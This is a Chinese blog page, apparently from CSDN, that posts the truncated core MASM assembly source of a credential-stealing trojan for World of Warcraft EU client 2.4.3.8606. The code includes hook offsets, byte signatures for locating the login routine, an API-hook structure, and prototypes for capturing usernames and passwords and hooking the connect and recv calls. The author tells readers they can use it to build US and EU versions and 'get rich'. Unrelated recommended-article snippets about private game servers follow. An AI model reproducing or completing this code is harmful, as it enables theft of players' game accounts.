欧服WOW木马核心源代码,游戏版本v2.4.3.8606

最新推荐文章于 2023-06-04 18:34:36 发布
原创 最新推荐文章于 2023-06-04 18:34:36 发布 · 1.5k 阅读 · 2
标签
#游戏 #hook #null #api #dll
#byte
本文详细探讨了针对魔兽世界欧服v2.4.3.8606版本的一个木马的核心源代码,涉及hook技术、API调用以及DLL注入等方面,揭示了恶意软件如何在游戏中隐蔽运行并影响玩家体验。
 对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW马来,大家发财去吧

Quote:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;                Programmed by asm, MSN:asm32@live.cn                          ;
;                  WOWGameMaker For WOW_MF_OF                                  ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;0041DAEA  |.  5E            pop    esi                <-------------特征码位置+12=断点位置
;0041DAEB  |.  33CD          xor    ecx, ebp
;0041DAED  |.  5B            pop    ebx
;0041DAEE  |.  E8 E7CAFEFF  call    0040A5DA
;0041DAF3  |.  8BE5          mov    esp, ebp
;0041DAF5  |.  5D            pop    ebp                <-------------断点位置
;0041DAF6  /.  C2 0400      retn    4                  <-------------ret执行后,游戏会跳转到005B55B4h这里执行。因此在木马里要
;搜索这个地址得特征码从而得到通用得地址,而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可

;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h

;005B55B4      8B4D FC      mov    ecx, dword ptr [ebp-4]    <-----------------得到要跳转的地址
;005B55B7      5F            pop    edi
;005B55B8      5E            pop    esi
;005B55B9  |.  33CD          xor    ecx, ebp
;005B55BB  |.  5B            pop    ebx
;005B55BC  |.  E8 1950E5FF  call    0040A5DA
;005B55C1      8BE5          mov    esp, ebp

;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
;----------------------------------------------------------------------------------------------------------------
.486
.model flat,stdcall
option casemap:none
include debug.inc
include        windows.inc
include        user32.inc
includelib        user32.lib
include        kernel32.inc
includelib        kernel32.lib
include        advapi32.inc
includelib        advapi32.lib
include        comctl32.inc
includelib        comctl32.lib
include        psapi.inc
includelib        psapi.lib
IncludeLib Masm32.lib
Include Masm32.inc
include    Shlwapi.inc
includelib  Shlwapi.lib
include    shell32.inc
includelib  shell32.lib
include macros.inc
includelib mylib.lib
include        wininet.inc
includelib    wininet.lib
HOOKAPI struct
a  byte 0B8h
PMyapi DWORD 0
d BYTE 0FFh
e BYTE 0E0h
HOOKAPI ends

MODULEINFO struct

lpBaseOfDll dword 0
SizeOfImage dword 0
EntryPoint dword 0

MODULEINFO ends
F_STOP                equ        0002h

;子程序声明

HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD
WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD
MyHookFunToGetUserAndPass proto  :DWORD  ,:DWORD,:DWORD
MyConnect  proto  :DWORD  ,:DWORD,:DWORD;,:DWORD
MyRecv proto  :DWORD  ,:DWORD,:DWORD,:DWORD
GetApi proto  :DWORD,:DWORD
BakDll proto  :DWORD,:DWORD

AntiFileToRun proto c :DWORD
BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
LoadModuleEx proto c :DWORD
GetModuleImageSize proto c :DWORD
CaleHookPointerWOW proto c
ExtractFileName proto c :DWORD
ExtractFilePath proto c :DWORD

;已初始化数据
.data
hInstance dd 0
WProcess dd 0

Papi1 DWORD ?
Papi2 DWORD ?
Papi3 DWORD ?
WritBak1 HOOKAPI <>
WritBak2 HOOKAPI <>
ApiBak1 db 10 dup(?)
ApiBak2 db 10 dup(?)
DllName1  db "ws2_32.dll",0
ApiName1  db "connect",0
最低0.47元/天 解锁文章
OregonCore:魔兽世界2.4.3服务器模拟器
02-05
欢迎来到OregonCore! OregonCore是一款旨在模拟《魔兽世界:燃烧远征》游戏服务器的软件。 我们的目标是创建一个稳定的MMO框架,并帮助我们社区中的教与学发展。 OregonCore依靠紧密的开发人员,测试人员和错误报告者社区来维持自己的生命,并感谢多年来参与该项目的所有人。 建立状态 编译器 平台 环境 状态 gcc / g ++ Linux x64 埃鲁纳残疾人 gcc / g ++ Linux x64 启用Eluna lang / c ++ Linux x64 埃鲁纳残疾人 lang / c ++ Linux x64 启用Eluna 文档,社区和支
tbc-db:mangos-tbc和《魔兽世界客户端补丁》 2.4.3的内容数据库
03-06
用于CMaNGOS / mangos-tbc的TBC-DB 一个供使用的内容数据库,以及《魔兽世界客户端补丁》 2.4.3- 。 它仅与客户端2.4.3(内部版本8606)兼容。 TBC-DB在GPL v3下发布。 该文件( LICENSE.md )必须是此软件制作的任何可再发行程序包的一部分。 如果要制作可再发行的副本,则不得从此软件中删除任何许可证。 TBC-DB包含的版权材料不属于GPL v3。 有关受版权保护的材料的信息位于文件( COPYRIGHT.md )中。 魔兽世界的内容和材料是暴雪或其许可方的商标和版权。 版权所有。 TBC-DB是CMaNGOS项目的一部分,与暴雪或其许可方无关。 兼容性 TBC-DB数据库仅与核心兼容。 入门 该数据库存储库的基本原理是拥有一个SQL文件,该文件保存数据库中的每个表。 将某些内容更改为数据库后,将通过在updates目录中添加
ARCEmu项目wow私服服务器网络模块分析(四)
10-12 5816
线程池: /* * Thread Pool Class * Copyright (C) Burlex * * This program is free software: you can redistribute it and/or modify * it unde
魔兽世界私服Trinity,从源码开始
mysouling的专栏
05-08 3万+
缘起因由 在一个无所事事的周末下午,突然想起魔兽世界,官方的账号很久没有上了,里面的大小号现在连满级都不是。以前曾经搭过传奇和星际争霸战网的私服自娱自乐,也听说过魔兽世界有开源的服务端模拟,既然兴致来了就小小的研究一下。 目前魔兽世界的私服比较流行的是MaNGOS和Trinity,二者都是模拟魔兽世界服务端。MaNGOS“号称”是一个研究型项目,目的是为了学习大规模的C++项目开发,有
目前最完美的魔兽世界服务端AzerothCore,Window系统小白10分钟搭建教程
热门推荐
09-12 4万+
首先下载服务端文件: 魔兽世界无限制服务端,巫妖王之怒,window版 - 阿里云盘资源分享 - 单机游戏免费下载 - 幻想游戏,幻想社区http://3a.hxyou.cn/softs/1134.html 原版AzerothCore编译,仿官方,集成Lua,无人数限制,无机器限制, 可能是目前修复最好的魔兽服务端了! 包含地图文件和数据库(已汉化),傻瓜式安装,一键启动 服务器推荐:尊云 68/月 系统推荐:Window Server 2019 详细搭建步骤: 将文件上传到服.
linux编译trinitycore,[MAC] 编译安装和测试《魔兽世界》模拟服务端 TrinityCore
weixin_36448083的博客
05-11 1004
1. 安装编译环境和依赖项客户端安装:下载地址(3.3.5a enUS),安装到:/Applications/World of Warcraft 目录下(后面会用到)安装Xcode:自行到 App Store 下载,完成之后需要执行 xcodeselect --install 来安装 command line tools安装homebrew:ruby-e"$(curl-fsSLhtt...
利用TrinityCore 框架的搭建魔兽世界私服
战斗果冻的训练中心
02-27 5493
TrinityCore 框架的搭建 框架信息 Github页https://github.com/TrinityCore/TrinityCore/releases 官网https://github.com/TrinityCore/TrinityCore/releases 服务器配置 双核心4G,debian 11.1 安装mysql 安装 mysql(版本5.7),据说是因为官网说的那个mariadb安装因为版本问题容易报错 wget [http://repo.mysql.com/mysql-apt-con
魔兽世界服务端端新手搭建教程
用最简单的方式说最重要的事!服务器、存储、云计 算、A智能的大数据产品、游戏开发技术。致力于广 大开发者、政企用户、各项机构等,构建云上世界提供全方位云计算解决方案。旨在打造差异化的开放式闭环生态系统帮助用户快速构建稳定、安全的云计算环境。
02-21 5509
去不排除的服和单机没啥区别,以怀旧服玩到10级以后就开始玩335端,一开始也和新入手的人一样云里雾里的,明杰也是很久以前开始研究魔兽服务器架设,主要原因是亚服经常要排队6-7个小时,经过长时间的学习总算有点成就,一、服务端架设新手向内容。1. 335端的架设。
魔兽世界AC服务端编译搭建(github开源项目)-含lua和机器人模块
qq_36006156的博客
06-04 2052
AC魔兽服务端二进制、docker(未更新)部署
网游服务器搭建方案图解(以魔兽世界为例)
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
10-03 2677
国服的巫妖王终于开了,而服务器“卡”的问题再次由于人数暴增而显现出来。下面小编就给大家介绍一下网络游戏的服务器搭建方案,也许大家能稍微理解一下服务器的苦衷。这么多新号,看着像开追悼会似的!如火如荼的网络游戏产业正吸引着各方的眼光,这其中也包括正迫切寻找新的利润增长点的电信运营商。
在线游戏网站(魔兽世界)网页模板
08-18
在线游戏网站(魔兽世界)网页模板 京华志&精华志出品 希望大家互相学习,互相进步 支持CSDN 支持微软 主要包括C# ASP.NET SQLDBA 源码 毕业设计 开题报告 答辩PPT等等好多知识
欧式风格家具网站源码-PHP
06-20
欧式风格家具网站源码是一款开源的THinkphp5.0 的 Blog系统,其衍生于优秀的内容管理系统易优cms。 欧式风格家具网站源码秉承了易优CMS的先进设计理念,并且专注于家居行业。 欧式风格家具网站源码特点: 简单方便 欧式风格家具网站源码安装十分方便,只需输入域名,然后再点两次鼠标,期间填入一些必要的安装信息就可以轻松完成整个安装过程。 使用十分便捷,安装后进后台,无需事先进行任何设置操作。 要进行网站设置也十分简单,几分钟就可以完成。 欧式风格家具网站源码功能介绍: 1、会员系统 2、支付功能 3、标签功能 4、熊掌号提交功能 5、文章发布功能 6、SEO设置功能 7、多语言版(后台一键开启) 8、插件功能 9、多语言功能 10、水印功能 欧式风格家具网站源码安装环境要求: 操作系统:Linux/Unix/Windows 软件环境:Apache/Nginx/IIS + PHP 5.5~7.1 + MySQL 5.1 及以上 本地电脑推荐使用PHPstudy安装,及安装在合适的网站空间、虚拟主机上。 默认后台 域名/login.php 欧式风格家具网站源码更新日志: 1、[安全]修复已知存在的安全漏洞; 2、[新增]广告位置的多种类型,适用于片碎化管理; 3、[新增]批量新增Tag标签的功能; 4、[新增]发布/编辑视频文档时,支持批量导入视频链接的功能; 5、[新增]内置腾讯云COS对象存储的逻辑,可以安装COS插件使用; 6、[新增]内置升级模式,可选择升级新版本,也可选择只升级安全补丁; 7、[新增]整点秒杀、优惠券(仅限于可视化商城小程序插件内使用); 8、[新增]商品评价功能,请参考comment标签手册(仅限于专业版商业授权); 9、[新增]商城退换货售后处理(仅限于专业版商业授权); 10、[新增]内置问答悬赏模型(仅限于专业版商业授权); 11、[优化]后台更多功能加入到管理员权限控制里; 12、[优化]tag列表页不存在的URL直接显示404; 13、[优化]后台会员列表支持用户名或昵称搜索; 14、[优化]前台列表页调用arclist标签后,不会生成多余的分页静态文件; 15、[优化]管理员可以预览待审核稿件的逻辑,保护内容隐私被盗取; 16、[优化]插件内置升级前后置方法,便于更好的插件在线升级; 17、[优化]后台更多功能新增通知管理入口; 18、[优化]后台栏目支持上级移动,栏目保持最多3级的逻辑; 19、[优化]后台商品规格的规格值支持是否同步更新; 20、[优化]多图上传的用户体验; 21、[优化]广告管理逻辑体验; 22、[修复]在IE系列浏览器中,会员升级支付无法进行; 23、[修复]样式影响了留言导出按钮被隐藏; 24、[修复]微站点开启之后,手机端会员中心无法退出的问题; 25、[修复]回收站还原文档报错的问题; 26、[修复]视频模型发布文档时不显示编辑器的问题; 27、[修复]部分前台模板的手机端收藏弹窗的兼容性; 28、[修复]后台编辑会员时,没有邮箱或手机属性时报错; 29、[修复]微信支付支持异步回调,确保用户行为中断不影响业务自动处理; 30、[修复]后台站内信通知删除报错的问题; 31、[修复]做了一些已知问题的修正和完善;
小鱼儿中英文外贸网站源码带后台,欧美风格
10-18
1,ASP编写,Access数据库,源代码全开源,未做任何加密,懂网页的也可以修改 2,采用UTF-8编码,全球打开网站不乱码 3,后台使用fckeditor国际流行编辑器,Word式自由排版 4,兼容IE、火狐各大常用浏览器,打开网页不变形 5,集成搜索引擎蜘蛛来访记录系统2.0,更好了解搜索引擎蜘蛛来访情况 6,网站导航实现自主管理,可自由添加、删除、隐藏栏目 7,管理员权限可分配,方便控制员工管理权限 8,后台可直接更换logo图片、公司名称,也可以隐藏logo、公司名称不显示 9,网站开关功能,可在需要时关闭网站,并可设置关站提示 10,可自定义网站首页title,keywords,description,url 方便seo 11,后台可添加第三方网站统计代码,方便了解网站访问详情 12,点击QQ、MSN、Skype、淘宝旺旺图标可直接在线聊天 13,可后台更换5张FLASH图片,也可自由显示1-5张广告图,可指定图片链接 14,后台可查看网站占用空间情况 15,一键生成所有静态功能,方便快捷,傻瓜操作,每次修改完网站之后需操作一次 16,后台可设置网站目录,方便在子目录测试 不懂的可以加qq:195094303
TBC2.43-WOW-EXE
01-20
TBC2.43版本官方启动器,由于恢复SF破坏的文件
魔兽世界终极版源代码
07-10
北京大学程序设计实习大作业源代码
魔兽世界服务器修改模型,超简单魔兽世界修改模型 2.43可用 无需登录器
weixin_26908317的博客
08-11 7413
准备工作:所需软件WINHEX,百度一下就有,华军什么的也可以。还有就是反向十六进制代码转换器。另外还需要一个代码查询网站http://wow.allakhazam.com/。打开网站点“search”。然后将语言选择为中文,输入要查询的装备的名称查询。然后点所需装备的连接,在出现的网页中点XML。拖动网页,会看见一片数字,其他的不管,只需要2个displayinfo中间的数字,例如,逐风剑的就是...
PbootCMS开发助手_pbootcms仿站工具_标签生成器下载
riizhiyiwen的博客
11-28 1339
PbootCMS开发助手_pbootcms仿站工具_标签生成器主要整合了PBOOTCMSCMS常用标签,实现复制粘贴即可做出网站前台调用,首页-列表页-内容页-搜索-系统标签设置重要的一个功能,可以直接生成一个完整的标签,比如,列表,最新的文章,随机文章等等!几乎包含了所有标签套用。PbootCMS开发助手发展史,各国都在不断改进发现功夫,规范理想,在焦点上,力求完善。以素质为例,为了PbootCMS开发助手,巴拿马政府采取了互惠互利的政策,使得。鲜明的案例告诉我们,要实现PbootCMS开发助手的目的,必
控制台彩色版“俄罗斯方块”
gemire的专栏
06-23 6280
此程序的AI采用的是Pierre Dellacherie算法的改进方案,据说可以摆几十W个不死,不过我把一个好算法实现渣了,只能摆到1W左右,最多最多的一次摆到了6W
c/c++ 实现俄罗斯方块小游戏(附全部源码
q841447739的博客
08-11 2万+
使用easyX库,基于c/c++,实现俄罗斯方块小游戏。(附全部源码
旧物回收类网站源码v2.4
linxiaoming6的博客
05-21 1353
简介: 旧物回收类网站源码系统是一款开源的THinkphp5.0 的 Blog系统,其衍生于优秀的内容管理系统易优cms。 旧物回收类网站源码系统秉承了易优CMS的先进设计理念,并且专注于旧物回收。 易优旧物回收系统使用十分便捷,便捷到您只需直接开始发布旧物回收就可以了。 旧物回收类网站系统特点: 简单方便 旧物回收类网站系统安装十分方便,只需输入域名,然后再点两次鼠标,期间填入一些必要的安装信息就可以轻松完成整个安装过程。 使用十分便捷,安装后进后台,直接写旧物回收内容就可以了,无需事先进行任何设置操作
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值